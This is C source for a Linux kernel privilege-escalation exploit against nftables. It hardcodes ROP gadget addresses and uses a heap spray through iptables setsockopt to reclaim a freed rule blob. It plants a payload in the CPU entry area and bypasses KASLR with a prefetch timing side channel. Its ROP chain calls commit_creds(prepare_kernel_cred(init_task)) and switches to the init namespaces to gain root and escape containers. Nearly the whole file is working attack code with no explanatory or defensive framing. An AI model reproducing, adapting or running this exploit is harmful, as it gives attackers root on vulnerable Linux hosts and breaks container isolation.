#define _GNU_SOURCE
typedef unsigned char u8;
typedef unsigned short u16;
typedef unsigned int u32;
typedef unsigned long long u64;
typedef char i8;
typedef short i16;
typedef int i32;
typedef long long i64;


#define FAIL_IF(x) if ((x)) { \
    perror(#x); \
    return -1; \
}
#define PANIC_IF(x) if ((x)) { \
    perror(#x); \
    exit(errno); \
}
#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0]))

inline static int _pin_to_cpu(int id) {
  cpu_set_t set;
  CPU_ZERO(&set);
  CPU_SET(id, &set);
  return sched_setaffinity(getpid(), sizeof(set), &set);
}



//
// offsets
//

// ffffffff81e09097: push rdi; jmp qword ptr [rsi+0xf]; 	4c57ff660f
#define PUSH_RDI_JMP_RSI_0XF 0xffffffff81e09097
// ffffffff8126df29: pop rsp; add rsp, 0x20; pop rbx; jmp __x86_return_thunk (0xffffffff82404c80); ret; 	5c4883c4205be94c6d1901c3
#define POP_RSP_ADD_RSP_0X20_POP_RBX_RET 0xffffffff8126df29
// ffffffff81251258: pop rdx; jmp __x86_return_thunk (0xffffffff82404c80); ret; 	5ae9223a1b01c3
#define POP_RDX_RET 0xffffffff81251258
// ffffffff818180b4: pop rbp; jmp __x86_return_thunk (0xffffffff82404c80); ret; 	5de9c6cbbe00c3
#define POP_RBP_RET 0xffffffff818180b4
// ffffffff8102871c: pop rcx; jmp __x86_return_thunk (0xffffffff82404c80); ret; 	59e95ec53d01c3
#define POP_RCX_RET 0xffffffff8102871c
// ffffffff818344a5: push rax; jmp qword ptr [rcx]; 	50ff21
#define PUSH_RAX_JMP_RCX 0xffffffff818344a5
// ffffffff81dadf48: pop rsp; jmp qword ptr [rsi+0xf]; 	5cff660f
#define POP_RSP_JMP_RSI_0XF 0xffffffff81dadf48
// ffffffff81bc9099: lea rax, [r12+rbp]; pop rbx; pop rbp; pop r12; pop r13; pop r14; jmp __x86_return_thunk (0xffffffff82404c80); ret; 	498d042c5b5d415c415d415ee9d6bb8300c3
#define LEA_RAX_R12_PLUS_RBP_POP5_RET 0xffffffff81bc9099
// ffffffff812f9168: pop rdi; jmp __x86_return_thunk (0xffffffff82404c80); ret; 	5fe912bb1001c3
#define POP_RDI_RET 0xffffffff812f9168
// ffffffff8124f56d:       48 89 c7                mov    %rax,%rdi
// ffffffff8124f570:       48 89 3d d1 b9 23 03    mov    %rdi,0x323b9d1(%rip)        # ffffffff8448af48 <vmcoreinfo_data_safecopy>
// ffffffff8124f577:       e9 04 57 1b 01          jmp    ffffffff82404c80 <__x86_return_thunk>
#define MOV_RDI_RAX_RET 0xffffffff8124f56d
// ffffffff81bd1748: pop rsi; jmp __x86_return_thunk (0xffffffff82404c80); ret; 	5ee932358300c3
#define POP_RSI_RET 0xffffffff81bd1748
// function trailer for nft_do_chain
#define NFT_DO_CHAIN_LEAVE 0xffffffff81e517eb
// we use this for the fast path to copy some data from the skb into RSI
#define NFT_PAYLOAD_FAST_OPS 0xffffffff82b27580
#define FIND_TASK_BY_VPID 0xffffffff811bbe60
#define SWITCH_TASK_NAMESPACES 0xffffffff811c3a30
#define COMMIT_CREDS 0xffffffff811c55a0
#define PREPARE_KERNEL_CRED 0xffffffff811c5840
#define INIT_TASK 0xffffffff83815a40
#define INIT_NSPROXY 0xffffffff83876720
// ffffffff810ebbdd: add rsp, 0x88; jmp __x86_return_thunk (0xffffffff82404c80); ret; 	4881c488000000e997903101c3
#define ADD_RSP_0X88_RET 0xffffffff810ebbdd


//
//
//

// just use side channels
int64_t bypass_kaslr(u64 base);

// CPU entry area pointers. We prepare some memory here that will be referenced
// by the ROP chains.
// We need:
//  - the struct nft_expr_ops { .eval } member
//  - a pivot gadget to restore the stack
//  - and a pointer to the nft_do_chain function trailer so that we jump to it.
#define CPU_ENTRY_AREA_BASE(cpu) (0xfffffe0000001000ull + (u64)cpu * 0x3b000)
#define PAYLOAD_LOCATION(cpu) (CPU_ENTRY_AREA_BASE(cpu) + 0x1f58)
#define MAIN_CPU 0
#define HELPER_CPU 1

struct cpu_entry_area_payload {
  union {
    struct {
      // function to call to evaluate the expression
      u64 nft_expr_eval;
      // stack pivot gadget to go back to normal execution
      u64 pop_rsp_jmp_rsi_0xf;
      // nft_do_chain jump target to restore execution
      u64 nft_do_chain_leave;
    };
    u64 regs[16];
  };
};


// Our payload which will reclaim the object in chain->{blob_gen_1,blob_gen_0}
// This is essentially a struct nft_rule_blob with a single rule
// This rule than has 4 expressions which will run our payload.
struct payload {

  //
  // note that we omit a hole of ~60 bytes which is all zero
  //

  // rule data (1 rule)
  u64 is_last:1, dlen:12, handle:42;

  // We use this to setup the regs argument passed to our following fake_expr in RSI.
  // Essentially these exprs will copy data from the packet into the regs.
  // We need it for our stack pivot.
  struct {
    u64 fast_ops;
    u8 base;
    u8 offset;
    u8 len;
    u8 dreg;
    u32 __padding;
  } __attribute__((__packed__)) fast_exprs[3] __attribute__((aligned(__alignof__(u64))));;

  // Actual call into our rop chain
  struct {
    u64 fake_ops;
    u64 rop_chain[128];
  } fake_expr;
};

static u32 rop_chain_rsi[6] = {};
static struct payload payload = {};

void setup_registers(struct payload* payload, int64_t kernel_off) {
  // this function sets up the part of the payload which sets up the nft_regs structure
  // in nft_do_chain.
  // essentially we copy a stack pivot gadget into them
  // the payload will be copied directly from the packet we send to trigger the payload

  *(u64*)((u8*)rop_chain_rsi + 0xF) = kernel_off + POP_RSP_ADD_RSP_0X20_POP_RBX_RET;
  const u32* regs = rop_chain_rsi;
  int j = 0;
  for (int i = 0; i < 6; i++) {
    if (regs[i] == 0) {
      continue;
    }

    payload->fast_exprs[j].fast_ops = kernel_off + NFT_PAYLOAD_FAST_OPS;
    payload->fast_exprs[j].base = NFT_PAYLOAD_NETWORK_HEADER;
    // offset of our skb payload data
    payload->fast_exprs[j].offset = 0x1c + i * 4;
    payload->fast_exprs[j].len = 4;
    payload->fast_exprs[j].dreg = i;

    j++;
  }

  payload->is_last = 0;
  payload->dlen = sizeof(struct payload) - offsetof(struct payload, fast_exprs);
  payload->handle = 0xDEAD;
}

void setup_rop_chain(struct payload* payload, int64_t kernel_off) {
  payload->fake_expr.fake_ops = PAYLOAD_LOCATION(HELPER_CPU) + offsetof(struct cpu_entry_area_payload, nft_expr_eval);

  // top of stack points contains &payload->fake_expr
  // we jump into this using this gadget:
  // pop rsp; add rsp, 0x20; pop rbx; jmp __x86_return_thunk (0xffffffff82404c80); ret;

  u64* rop_chain = payload->fake_expr.rop_chain;
  int i = 0x20 / 8;

  // had some issue with object boundaries. Lets get some more stack space ..
  rop_chain[i++] = kernel_off + ADD_RSP_0X88_RET;
  i += 0x88 / 8;
  rop_chain[i++] = kernel_off + ADD_RSP_0X88_RET;
  i += 0x88 / 8;
  rop_chain[i++] = kernel_off + ADD_RSP_0X88_RET;
  i += 0x88 / 8;
  rop_chain[i++] = kernel_off + ADD_RSP_0X88_RET;
  i += 0x88 / 8;

  rop_chain[i++] = kernel_off + POP_RDI_RET;
  rop_chain[i++] = kernel_off + INIT_TASK;
  rop_chain[i++] = kernel_off + PREPARE_KERNEL_CRED;

  rop_chain[i++] = kernel_off + MOV_RDI_RAX_RET;
  rop_chain[i++] = kernel_off + COMMIT_CREDS;

  rop_chain[i++] = kernel_off + POP_RDI_RET;
  rop_chain[i++] = 1;
  rop_chain[i++] = kernel_off + FIND_TASK_BY_VPID;

  rop_chain[i++] = kernel_off + MOV_RDI_RAX_RET;
  rop_chain[i++] = kernel_off + POP_RSI_RET;
  rop_chain[i++] = kernel_off + INIT_NSPROXY;
  rop_chain[i++] = kernel_off + SWITCH_TASK_NAMESPACES;

  // prepare to restore execution
  // nft_do_chain:
  //   entry:
  //     sub 0x220 rsp
  //     lea r12, [rsp+0x48]
  //   exit:
  //     ffffffff81e517eb: 89 d0   mov    %edx,%eax
  rop_chain[i++] = kernel_off + POP_RBP_RET;
  rop_chain[i++] = 0x220 - 0x48;
  rop_chain[i++] = kernel_off + LEA_RAX_R12_PLUS_RBP_POP5_RET;
  i += 5;

  // prepare the stack restore gadget
  rop_chain[i++] = kernel_off + POP_RCX_RET;
  rop_chain[i++] = PAYLOAD_LOCATION(HELPER_CPU) + offsetof(struct cpu_entry_area_payload, pop_rsp_jmp_rsi_0xf);

  // prepare the return jmp gadget
  rop_chain[i++] = kernel_off + POP_RSI_RET;
  rop_chain[i++] = PAYLOAD_LOCATION(HELPER_CPU) + offsetof(struct cpu_entry_area_payload, nft_do_chain_leave) - 0xf;

  // setup the return vaule
  rop_chain[i++] = kernel_off + POP_RDX_RET;
  rop_chain[i++] = NF_DROP;

  // actually restore execution
  rop_chain[i++] = kernel_off + PUSH_RAX_JMP_RCX;
}


static void sig_handler(int s) {}

static __attribute__((noreturn)) void write_cpu_entry_area(void* payload) {
  asm volatile (
	  "mov %0, %%rsp\n"
	  "pop %%r15\n"
	  "pop %%r14\n"
	  "pop %%r13\n"
	  "pop %%r12\n"
	  "pop %%rbp\n"
	  "pop %%rbx\n"
	  "pop %%r11\n"
	  "pop %%r10\n"
	  "pop %%r9\n"
	  "pop %%r8\n"
	  "pop %%rax\n"
	  "pop %%rcx\n"
	  "pop %%rdx\n"
	  "pop %%rsi\n"
	  "pop %%rdi\n"
	  "divq (0x1234000)\n"
    "1:\n"
    "jmp 1b\n"
    : : "r"(payload)
  );
  __builtin_unreachable();
}

// Fill the CPU entry area exception stack of HELPER_CPU with a
// struct cpu_entry_area_payload
static void setup_cpu_entry_area(int64_t kernel_off) {
  if (fork()) {
    return;
  }

  struct cpu_entry_area_payload payload = {};
  payload.nft_expr_eval = kernel_off + PUSH_RDI_JMP_RSI_0XF;
  payload.pop_rsp_jmp_rsi_0xf = kernel_off + POP_RSP_JMP_RSI_0XF;
  payload.nft_do_chain_leave = kernel_off + NFT_DO_CHAIN_LEAVE;

  PANIC_IF(_pin_to_cpu(HELPER_CPU) < 0);
  PANIC_IF(signal(SIGFPE, sig_handler) == SIG_ERR);
  PANIC_IF(signal(SIGTRAP, sig_handler) == SIG_ERR);
  PANIC_IF(signal(SIGSEGV, sig_handler) == SIG_ERR);
  PANIC_IF(setsid() == -1);

  write_cpu_entry_area(&payload);
}


static void* payload_page = NULL;

int spray_payload(int fd) {
  struct ipt_replace replace = {};
  // into dyn-kmalloc-8k-cg please
  replace.size = 0x1000 + 1;
  // need this to make the allocation
  replace.num_counters = 1;

  memcpy(payload_page, &replace, sizeof(replace));
  _Static_assert(sizeof(replace) + sizeof(payload) <= 0x1000, "payload does not fit into one page");
  memcpy(payload_page + sizeof(replace), &payload, sizeof(payload));

  for (int i = 0; i < 8; i++) {
    // this faults during the copy_from_user_call, immediately frees our payload again,
    // but that is enough for us
    if (setsockopt(fd, SOL_IP, IPT_SO_SET_REPLACE, payload_page, 0x1000 * 2) == 0 || errno != EFAULT) {
      printf("spray payload: setsockopt(): unexpected error?\n");
      return -1;
    }
  }

  return 0;
}


int __netlink_send(int fd, const void* nlh, size_t size) {
    struct iovec iov = {
        .iov_base = (void*)nlh,
        .iov_len = size,
    };
    struct msghdr msg = {
        .msg_name = NULL,
        .msg_namelen = 0,
        .msg_iov = &iov,
        .msg_iovlen = 1,
        .msg_control = NULL,
        .msg_controllen = 0,
        .msg_flags = 0,
    };

    if (sendmsg(fd, &msg, 0) < 0) {
        perror("sendmsg()");
        return -1;
    }

    return 0;
}

int netlink_recv(int fd, void* nlh, size_t size) {
    struct iovec iov = {
        .iov_base = (void*)nlh,
        .iov_len = 0,
    };
    struct msghdr msg = {
        .msg_name = NULL,
        .msg_namelen = 0,
        .msg_iov = NULL,
        .msg_iovlen = 0,
        .msg_control = NULL,
        .msg_controllen = 0,
        .msg_flags = MSG_TRUNC,
    };

    memset(nlh, 0, size);
    iov.iov_len = recvmsg(fd, &msg, MSG_PEEK | MSG_TRUNC | MSG_DONTWAIT);
    if ((ssize_t)iov.iov_len < 0) {
        if (errno == EAGAIN) {
            return 0;
        }

        perror("recvmsg()");
        return -1;
    }
    if (iov.iov_len > size) {
        fprintf(stderr, "message too large: %zu > %zu\n", iov.iov_len, size);
        return -1;
    }

    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    return recvmsg(fd, &msg, 0);
}

int netlink_errno(const struct nlmsghdr* nlh) {
    if (nlh->nlmsg_len == 0) {
        return 0;
    }
    if (nlh->nlmsg_type != NLMSG_ERROR) {
        fprintf(stderr, "warning: not a netlink error message: %hu\n", nlh->nlmsg_type);
        return 0;
    }
    struct nlmsgerr* e = NLMSG_DATA(nlh);
    if (e->error != 0) {
        errno = -e->error;
    }

    return e->error;
}

int netlink_open(int proto) {
    struct sockaddr_nl addr = {0};
    addr.nl_family = AF_NETLINK;

    int s = socket(AF_NETLINK, SOCK_RAW, proto);
    if (s < 0) {
        perror("socket()");
        return s;
    }
    if (bind(s, (struct sockaddr*)&addr, sizeof(addr)) == -1) {
        perror("bind()");
        return -1;
    }

    return s;
}

static inline int netlink_send(int fd, const struct nlmsghdr* nlh) {
    return __netlink_send(fd, nlh, nlh->nlmsg_len);
}

int ip_link_set_flags(int s, int ifindex, unsigned int ifi_flags) {
    u8 buf[1024] = {0};
    struct nlmsghdr* nlh = (void*)buf;

    struct ifinfomsg* data = NLMSG_DATA(nlh);
    nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN;
    nlh->nlmsg_type = RTM_NEWLINK;
    nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
    nlh->nlmsg_seq = 0;
    nlh->nlmsg_pid = 0;

    data->ifi_family = PF_UNSPEC;
    data->ifi_type = 0;
    data->ifi_index = ifindex;
    data->ifi_flags = ifi_flags;// IFF_UP;
    data->ifi_change = 1;

    FAIL_IF(netlink_send(s, nlh) < 0);
    FAIL_IF(netlink_recv(s, nlh, sizeof(buf)) < 0);
    FAIL_IF(netlink_errno(nlh) != 0);
    return 0;
}


void sandbox() {
  //PANIC_IF(_pin_to_cpu(MAIN_CPU) < 0);
  PANIC_IF(unshare(CLONE_NEWUSER | CLONE_NEWNET));

  int s;
  PANIC_IF((s = netlink_open(NETLINK_ROUTE)) < 0);
  PANIC_IF(ip_link_set_flags(s, 1 /* if_nametoindex("lo") */, IFF_UP));
  close(s);
}

// KASLR bypass
//
// This code is adapted from https://github.com/IAIK/prefetch/blob/master/cacheutils.h
//
inline __attribute__((always_inline)) uint64_t rdtsc_begin() {
  uint64_t a, d;
  asm volatile ("mfence\n\t"
    "RDTSCP\n\t"
    "mov %%rdx, %0\n\t"
    "mov %%rax, %1\n\t"
    "xor %%rax, %%rax\n\t"
    "lfence\n\t"
    : "=r" (d), "=r" (a)
    :
    : "%rax", "%rbx", "%rcx", "%rdx");
  a = (d<<32) | a;
  return a;
}

inline __attribute__((always_inline)) uint64_t rdtsc_end() {
  uint64_t a, d;
  asm volatile(
    "xor %%rax, %%rax\n\t"
    "lfence\n\t"
    "RDTSCP\n\t"
    "mov %%rdx, %0\n\t"
    "mov %%rax, %1\n\t"
    "mfence\n\t"
    : "=r" (d), "=r" (a)
    :
    : "%rax", "%rbx", "%rcx", "%rdx");
  a = (d<<32) | a;
  return a;
}


void prefetch(void* p)
{
  asm volatile (
    "prefetchnta (%0)\n"
    "prefetcht2 (%0)\n"
    : : "r" (p));
}

size_t flushandreload(void* addr) // row miss
{
  size_t time = rdtsc_begin();
  prefetch(addr);
  size_t delta = rdtsc_end() - time;
  return delta;
}

int64_t bypass_kaslr(u64 base) {
    if (!base) {
      #ifdef KASLR_BYPASS_INTEL
        #define OFFSET 0
        #define START (0xffffffff81000000ull + OFFSET)
        #define END   (0xffffffffD0000000ull + OFFSET)
        #define STEP   0x0000000001000000ull
        while (1) {
            u64 bases[7] = {0};
            for (int vote = 0; vote < ARRAY_LEN(bases); vote ++) {
                size_t times[(END - START) / STEP] = {};
                uint64_t addrs[(END - START) / STEP];

                for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
                    times[ti] = ~0;
                    addrs[ti] = START + STEP * (u64)ti;
                }

                for (int i = 0; i < 16; i++) {
                for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
                    u64 addr = addrs[ti];
                    size_t t = flushandreload((void*)addr);
                    if (t < times[ti]) {
                        times[ti] = t;
                    }
                }
                }

                size_t minv = ~0;
                size_t mini = -1;
                for (int ti = 0; ti < ARRAY_LEN(times) - 1; ti++) {
                    if (times[ti] < minv) {
                        mini = ti;
                        minv = times[ti];
                    }
                }

                if (mini < 0) {
                    return -1;
                }

                bases[vote] = addrs[mini];
            }

            int c = 0;
            for (int i = 0; i < ARRAY_LEN(bases); i++) {
              if (c == 0) {
                base = bases[i];
              } else if (base == bases[i]) {
                c++;
              } else {
                c--;
              }
            }

            c = 0;
            for (int i = 0; i < ARRAY_LEN(bases); i++) {
              if (base == bases[i]) {
                c++;
              }
            }
            if (c > ARRAY_LEN(bases) / 2) {
              base -= OFFSET;
              goto got_base;
            }

            printf("majority vote failed:\n");
            printf("base = %llx with %d votes\n", base, c);
        }
      #else
        #define START (0xffffffff81000000ull)
        #define END (0xffffffffc0000000ull)
        #define STEP 0x0000000000200000ull
        #define NUM_TRIALS 7
        // largest contiguous mapped area at the beginning of _stext
        #define WINDOW_SIZE 11

        while (1) {
            u64 bases[NUM_TRIALS] = {0};

            for (int vote = 0; vote < ARRAY_LEN(bases); vote ++) {
                size_t times[(END - START) / STEP] = {};
                uint64_t addrs[(END - START) / STEP];

                for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
                    times[ti] = ~0;
                    addrs[ti] = START + STEP * (u64)ti;
                }

                for (int i = 0; i < 16; i++) {
                for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
                    u64 addr = addrs[ti];
                    size_t t = flushandreload((void*)addr);
                    if (t < times[ti]) {
                        times[ti] = t;
                    }
                }
                }

                uint64_t max = 0;
                int max_i = 0;
                for (int ti = 0; ti < ARRAY_LEN(times) - WINDOW_SIZE; ti++) {
                    uint64_t sum = 0;
                    for (int i = 0; i < WINDOW_SIZE; i++) {
                        sum += times[ti + i];
                    }
                    if (sum > max) {
                        max = sum;
                        max_i = ti;
                    }
                }

                bases[vote] = addrs[max_i];
            }

            int c = 0;
            for (int i = 0; i < ARRAY_LEN(bases); i++) {
              if (c == 0) {
                base = bases[i];
              } else if (base == bases[i]) {
                c++;
              } else {
                c--;
              }
            }

            c = 0;
            for (int i = 0; i < ARRAY_LEN(bases); i++) {
              if (base == bases[i]) {
                c++;
              }
            }
            if (c > ARRAY_LEN(bases) / 2) {
              goto got_base;
            }

            printf("majority vote failed:\n");
            printf("base = %llx with %d votes\n", base, c);
        }
      #endif
    }

got_base:
    printf("using kernel base %llx\n", base);

    i64 off = base - 0xffffffff81000000;
    printf("kernel off: %lld\n", off);

    return off;
    
}
